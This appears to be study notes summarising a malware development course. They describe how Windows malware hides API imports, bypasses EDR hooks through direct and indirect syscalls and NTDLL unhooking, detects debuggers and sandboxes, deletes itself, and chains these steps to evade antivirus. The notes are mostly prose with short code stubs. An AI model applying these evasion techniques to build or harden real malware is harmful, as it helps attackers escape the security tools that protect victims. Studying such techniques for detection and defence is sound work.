Instead of importing APIs at compile time (which leaves traces in the IAT), use GetModuleHandle + GetProcAddress at runtime to obtain function addresses. However, directly calling GetModuleHandle and GetProcAddress still leaves traces in the IAT.

Method 2: Custom GetProcAddress & GetModuleHandle

Implement custom versions of GetProcAddress and GetModuleHandle by parsing PE headers directly. The custom GetModuleHandle traverses PEB → InMemoryOrderModuleList to find DLLs; the custom GetProcAddress parses the DLL's Export Table to find functions by name or hash.

API Hashing

Combines String Hashing with IAT Hiding: instead of using string names, use the hash of API names to find functions. This technique completely removes API name strings from the binary, making static analysis much more difficult.

Compile-Time API Hashing

Takes API Hashing a step further: hashes are calculated at compile time using constexpr or macros, leaving no strings in the binary. At runtime, only pre-calculated hash values are used to resolve APIs.

API Hooking

API Hooking is a technique that intercepts and modifies the behavior of API functions by modifying code at the function's address. It is both a tool used by EDR for monitoring and a technique that malware can utilize. The main hooking methods include:

Detours

Microsoft Detours is the most popular hooking library. It works by overwriting the first 5+ bytes of the target function with a jump instruction (trampoline) to the hook function. When the original function is called, the execution flow is redirected to the hook function, which can inspect/modify parameters before calling the original function or skip it entirely.

MinHook Library

MinHook is a lightweight hooking library that supports hooking multiple functions simultaneously. It provides a simple API: MH_Initialize, MH_CreateHook, MH_EnableHook.

API Hooking Using Windows APIs

Hooking using pure Windows APIs without external libraries. The technique: change memory protection, write jump instructions, restore protection. Can be used to build keyloggers (hook GetAsyncKeyState or use SetWindowsHookEx) or shellcode injection monitors.

Syscalls

Syscalls provide a mechanism to call directly into kernel mode, bypassing the WinAPI and ntdll.dll layers. EDRs commonly hook functions in ntdll.dll to monitor API calls — by calling syscalls directly, malware completely bypasses userland hooks. However, syscall numbers change between Windows versions, so techniques are needed to determine the correct syscall number at runtime.

Standard Flow (can be hooked by EDR): Application -> kernel32.dll -> ntdll.dll -> syscall -> Kernel Direct Syscall (bypasses EDR userland hooks): Application -> syscall instruction -> Kernel Indirect Syscall (more stealthy): Application -> return to ntdll (syscall; ret) -> Kernel

SysWhispers

SysWhispers is a tool that automatically generates syscall stubs for NTAPI functions. It generates assembly code containing the syscall number and stub code for each function. SysWhispers2 improves upon this by automatically resolving syscall numbers at runtime through a sorting algorithm. SysWhispers3 adds support for indirect syscalls and other advanced techniques.

c
// SysWhispers2 - auto-resolve syscall number at runtime
// Generated stub for NtAllocateVirtualMemory
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect);

// Implementation auto-finds syscall number
// by sorting functions in ntdll export table

Hell's Gate

Hell's Gate is a technique for resolving syscall numbers at runtime by directly reading the code of ntdll.dll in memory. If EDR has already hooked a function in ntdll, the first bytes will be replaced with a jump instruction. Hell's Gate detects hooks by checking the first bytes of the function — if it starts with mov eax, SSN (4C 8B D1 B8), it has not been hooked and the syscall number can be extracted; if it starts with a jump instruction, it has been hooked.

c
// Hell's Gate - Resolve syscall number from ntdll
// Check if function is hooked
// mov r10, rcx    -> 4C 8B D1
// mov eax, SSN    -> B8 XX XX 00 00
// If first byte is 0x4C -> not hooked, extract SSN
// If first byte is 0xE9 or 0xFF -> hooked

typedef struct _SYSCALL_ENTRY {
    DWORD dwSSN;
    PVOID pSyscallAddr;
} SYSCALL_ENTRY;

// Find unhooked syscall address
// (jmp to syscall; ret instruction in ntdll)
// Used for indirect syscalls

Anti-Analysis

Anti-analysis techniques help malware remain undetected for longer periods, providing additional time to modify code and make it harder to detect. The goal is not to make malware impossible to analyze (which is impossible), but to make the analysis process more time-consuming.

IsDebuggerPresent

The simplest function to detect a debugger. However, directly calling the WinAPI's IsDebuggerPresent is suspicious and can be bypassed using ScyllaHide. A better approach: check PEB.BeingDebugged directly.

c
// Custom IsDebuggerPresent - check PEB directly
BOOL IsDebuggerPresent2() {
#ifdef _WIN64
    PPEB pPeb = (PEB*)(__readgsqword(0x60));
#elif _WIN32
    PPEB pPeb = (PEB*)(__readfsdword(0x30));
#endif
    return pPeb->BeingDebugged;
}

NtQueryInformationProcess

Use NtQueryInformationProcess with ProcessDebugPort (class 7) to check for a debugger. If it returns a non-zero value, the process is being debugged. This technique is harder to bypass because it queries the kernel object directly.

Hardware Breakpoints Detection

Detect hardware breakpoints by examining the thread context — specifically the debug registers DR0-DR3 (breakpoint addresses) and DR7 (breakpoint controls). If any of DR0-DR3 are non-zero, a debugger has placed hardware breakpoints.

Timing Checks

Use GetTickCount64 or QueryPerformanceCounter to measure time between two points in the code. If the time is abnormally long, a debugger may be single-stepping through the code. Simple but effective technique.

Self-Deletion

Delete the malware's own executable file after it has started running, removing the on-disk artifact. Use DeleteFile combined with MoveFileEx using the MOVEFILE_DELAY_UNTIL_REBOOT flag to mark for deletion on restart, or delete directly by opening the file with FILE_FLAG_DELETE_ON_CLOSE.

Anti-Virtual Environments

Anti-VM techniques help malware detect whether it is running in a virtual machine or sandbox. If a virtual environment is detected, the malware will execute benign code or stop entirely. This is an effective way to avoid analysis by automated sandbox systems (Cuckoo, Any.run, CrowdStrike Sandbox).

Hardware Specs Check

Check hardware specifications: RAM below 4GB, CPU cores below 2, disk size below 60GB — all indicators of a VM. Use GlobalMemoryStatusEx, GetSystemInfo, and GetDiskFreeSpaceExW.

Machine Resolution Check

VMs often use default resolutions (800x600, 1024x768). Check using GetSystemMetrics with SM_CXSCREEN and SM_CYSCREEN.

Filename Check

Some sandboxes name files according to specific patterns (hash, sample, malware). Check the current executable's filename.

Running Processes Check

Check for VM-specific processes: vmtoolsd.exe, vmwaretray.exe, vboxservice.exe, xenservice.exe.

User Interaction Check

Sandboxes typically lack user interaction. Check click counts, idle time, and cursor position. If there is no interaction for an extended period, the malware may be running in a sandbox.

Multiple Delay Execution Techniques

Sandboxes often have timeouts to avoid infinite execution. Use various delay techniques to outlast them: WaitForSingleObject, MsgWaitForMultipleObjectsEx, NtWaitForSingleObject, NtDelayExecution. Each technique has unique characteristics and is harder to patch than a simple Sleep call.

API Hammering

API Hammering is a technique that consumes CPU time by calling ineffective APIs repeatedly. Sandboxes often accelerate time (fast-forward Sleep), but API Hammering forces the sandbox to execute each API call, making the analysis time very long and potentially exceeding the sandbox's timeout.

EDR Bypass & NTDLL Unhooking

EDRs (Endpoint Detection and Response) hook functions in ntdll.dll to monitor API calls. NTDLL Unhooking is a technique that restores the original code of ntdll.dll, removing EDR hooks. There are several unhooking methods:

NTDLL Unhooking from Disk

Read a clean copy of ntdll.dll from disk (C:\Windows\System32\ntdll.dll), compare it with the loaded version in memory, and overwrite the text section of the in-memory version with the clean copy from disk. Use CreateFileW + ReadFile or memory mapping to read the file.

NTDLL Unhooking from KnownDlls Directory

KnownDlls is a special directory in Windows that contains section objects for system DLLs, including ntdll.dll. These section objects contain clean (unhooked) copies of the DLLs. Use NtOpenSection + NtMapViewOfSection to map the clean copy, then copy the text section to the loaded ntdll.dll.

NTDLL Unhooking from Suspended Process

Create a new process in a suspended state (e.g., notepad.exe). This new process has a clean ntdll.dll because EDR hooks DLLs after the process starts (EDR hooks the process after initialization). Map ntdll.dll from the suspended process, copy the text section, and unmap.

NTDLL Unhooking from Web Server

Download a clean copy of ntdll.dll from a remote server, compare and overwrite the text section. This method bypasses all local hooking mechanisms but requires a network connection.

Indirect Syscalls — HellsHall

Direct Syscalls bypass userland hooks but leave a trace: the return address on the stack points to a memory region not belonging to ntdll.dll, which EDR can detect through return address checking. Indirect Syscalls solve this problem by executing the syscall instruction from within ntdll.dll (at a legitimate address), making the return address appear normal.

HellsHall combines Hell's Gate (resolve SSN) and Halos Gate (find unhooked syscall instructions in ntdll) to perform indirect syscalls. The process: find the SSN using the Hell's Gate method, find the address of a syscall; ret instruction within ntdll, and call that address — the return address on the stack will belong to ntdll, bypassing return address checking.

Direct vs Indirect Syscalls Comparison

Direct Syscall: The syscall instruction resides in malware code. The return address on the stack points to the malware's memory region → easily detected by return address validation.

Indirect Syscall: The syscall instruction resides in ntdll.dll. The return address on the stack points to an ntdll region → appears like a legitimate function call, harder to detect.

Bypassing AVs

Effectively bypassing AV requires combining multiple techniques discussed in the previous sections. No single technique is sufficient to bypass all security solutions — a multi-layered (reverse defense-in-depth) approach is needed.

Malware Bypass Chain (combining multiple techniques): +-------------------------------------------------------------+ | 1. Payload Encryption (AES/RC4) | | -> Avoid static/signature detection | +-------------------------------------------------------------+ | 2. Payload Obfuscation (UUID/IPv4/MAC) | | -> Reduce entropy, appear as legitimate data | +-------------------------------------------------------------+ | 3. IAT Hiding + API Hashing | | -> Conceal API imports | +-------------------------------------------------------------+ | 4. NTDLL Unhooking | | -> Remove EDR userland hooks | +-------------------------------------------------------------+ | 5. Indirect Syscalls | | -> Bypass return address checking | +-------------------------------------------------------------+ | 6. Anti-Analysis + Anti-VM | | -> Avoid sandbox/debugger analysis | +-------------------------------------------------------------+ | 7. Mapping Injection / Function Stomping | | -> Avoid VirtualAllocEx/WriteProcessMemory detection | +-------------------------------------------------------------+ | 8. PPID Spoofing + Process Argument Spoofing | | -> Avoid behavioral detection | +-------------------------------------------------------------+

Binary Entropy Reduction

Encrypted payloads have high entropy — a suspicious indicator for AV. Entropy reduction techniques: insert legitimate strings, pad with the same byte, remove the CRT library (reduces size), use the EntropyReducer tool. The goal: reduce entropy to a level close to that of a normal binary.

CRT Library Removal

Removing the C Runtime Library significantly reduces binary size and entropy. Replace CRT functions with custom implementations: replace memcpy with a loop, replace printf with WriteConsoleA, etc. Set a custom entry point symbol to avoid needing CRT startup code.

IAT Camouflage

The compiler's dead-code elimination may remove "fake" imports added to disguise the real IAT. Use #pragma comment(linker, "/include:...") or volatile references to force the compiler to retain fake imports.

Block DLL Policy

Block DLL Policy is a technique that prevents EDR DLLs from being loaded into newly created processes. Use PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON flag. Can be applied to both local and remote processes.

References

This research document was compiled and authored based on the Malware Development course by qa210, covering 33 chapters from fundamentals to advanced topics. The content spans the entire MDLC — from basic Windows Architecture, PE Format, and DLL knowledge to advanced techniques like Indirect Syscalls, EDR Bypass, and NTDLL Unhooking.

Additional Topics Covered in the Full Course

TopicDescription
Malware SigningDigitally sign malware to bypass SmartScreen and trust verification
Payload Execution ControlUse Semaphore, Mutex, and Events to control payload execution flow
PE Header AnalysisDeep analysis of PE headers: RVAs, Export Table, IAT, Undocumented structures
Brute Force DecryptionEncrypt keys using custom functions, brute force to decrypt at runtime
NtCreateUserProcessCreate processes using NTAPI instead of CreateProcess, combined with PPID spoofing and block DLL
API HammeringConsume CPU time to outlast sandbox timeouts
Source

Malware Development course by qa210 — complete material with 33 chapters including theory, code demos, and practice exercises. This document summarizes the key concepts; reading the original material is recommended for a deeper understanding of each technique and hands-on practice with full code examples.

QA210
Research — Malware Development Fundamentals — W4LLZ